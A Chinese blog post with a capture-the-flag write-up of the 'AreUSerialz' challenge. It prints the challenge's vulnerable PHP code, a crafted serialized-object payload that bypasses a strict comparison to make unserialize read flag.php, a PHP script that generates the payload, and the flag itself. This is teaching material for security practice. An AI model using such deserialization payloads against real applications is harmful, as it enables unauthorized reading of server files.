AreUSerialz

最新推荐文章于 2023-10-22 16:56:46 发布
最新推荐文章于 2023-10-22 16:56:46 发布
阅读量481 收藏 1
点赞数 1
分类专栏: CTF 文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53568983/article/details/129647925
版权

AreUSerialz

一、答案

题目地址如下所示:
AreUSerialz

poc如下所示:
/?str=O:11:“FileHandler”:3:{s:2:“op”;s:2:" 2";s:8:“filename”;s:8:“flag.php”;s:7:“content”;s:2:“xx”;}

flag:ctfhub{96e5b05df6c9444d3fcda946}
在这里插入图片描述

二、解题流程

如下代码所示,是该题的代码:

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

整个代码的流程如下所示:

在这里插入图片描述

  1. 首先第一步读取的字符串应该是什么
    	<?php
class FileHandler
{
    public $op = ' 2';
    public $filename = 'flag.php';
    public $content = 'xx';
}
$a = new FileHandler();
$b = serialize($a);
echo $b . PHP_EOL; //我们的目标就是得到$b
$c = unserialize($b);
echo $c->op;
?>
  2. 由于:
     function __destruct() {
    if($this->op === "2")
        $this->op = "1";

    所以,public $op = ' 2';绕过

  3. 由于第五步:
    private function read() {
    $res = "";
    if(isset($this->filename)) {
        $res = file_get_contents($this->filename);
    }
    return $res;
}

    所以,public $filename = 'flag.php';读取flag

安全天天学
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2020年网鼎杯青龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
2020网鼎杯(青龙组)--WEB--AreUSerialz(反序列化)
a965527596的博客
05-17 2297
AreUSerialz 1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。 <?php include("flag.php"); highlight_file(__FILE__);
[网鼎杯 2020 青龙组]AreUSerialz
qq_45694932的博客
09-14 85
知识点 强弱类型的比较 protect 序列化后会有%00*%00字符 反序列化 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename
[网鼎杯 2020 青龙组]AreUSerialz 1
qq_53460654的博客
05-10 125
打开环境 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content =
网鼎杯2020[青龙组]--AreUSerialz
Oavinci的博客
06-28 6986
知识点: PHP反序列化漏洞 弱类型比较 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp...
buuctf-AreUSerialz
m0_62094846的博客
03-24 1507
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "He.
[网鼎杯 2020 青龙组]AreUSerialz(超详细)
最新发布
2201_75955146的博客
10-22 284
一周一更,这是第二周啦,还是一道PHP审计题。学了蛮久了,终于算是懂了一点了。话不多说,直接开始。感觉好难学啊!哎,慢慢来吧,会熬出头的。
序列化2之[网鼎杯 2020 青龙组]AreUSerialz1
qq_58970968的博客
04-17 2226
class FileHandler { protected $op; protected $filename; protected $content; function __construct(){ $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hello World!"; $this->process(); } public .
网鼎杯之php反序列化 AreUserialz
weixin_54431413的博客
04-16 2187
2020网鼎杯的php反序列化AreUserialz
网鼎杯2020-AreUserialz(14pt)
ro4lsc的博客
05-11 400
网鼎杯2020-AreUserialz(14pt) 这次的网鼎杯,不多说了,自己太菜了,大佬们tql 首先审计一波代码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1";
[网鼎杯 2020 青龙组]AreUSerialz 逻辑最清晰的解题思路&知识点补充(代码审计二)
qq_50589021的博客
04-25 344
[网鼎杯 2020 青龙组]AreUSerialz 先扫盲: PHP ord() 函数其返回值为ASCII码 file_put_contents() 函数把一个字符串写入文件中,如果成功,该函数将返回写入文件中的字符数。如果失败,则返回 False。 === 需要值和其所属的类型都符合要求 ‘2’ === 2 false == 值符合要求即可 ‘2’ == 2 true 题目: <?php include("flag.php"); highlight_file(__FILE__); class
buuCTF-AreUSerialz_第二届网鼎杯web
Fisher
05-22 680
写在前面: web菜鸟,在做buuctf中的网鼎杯赛题的时候,有去学习了一遍php反序列,加深了理解。 为什么会用到序列化,自己的理解就是当一段代码消失时候,保存的数据也会跟着消失,但时如果要是再去使用这些数据的时候,如果在添加十分的不方便,于是就出现了序列化,将数据保存起来。 关键点: 1.我们想用反序列必须存在 unserialize(),且提交的变量可控。 unserialize():反序列化,将字符串转化为类。 serialize():序列化,将类转化为字符串。 2.可控的值,为class 类中的属
CTF--[网鼎杯 2020 青龙组]AreUSerialz
bossDDYY的博客
10-13 954
CTF--[网鼎杯 2020 青龙组]AreUSerialz,就是一个简单的php反序列化+php弱类型比较 根据题目提示 猜测就可能是反序列化 打开题目 给的是源码 发现unserialize函数 确定是反序列化

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全天天学

你的鼓励是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值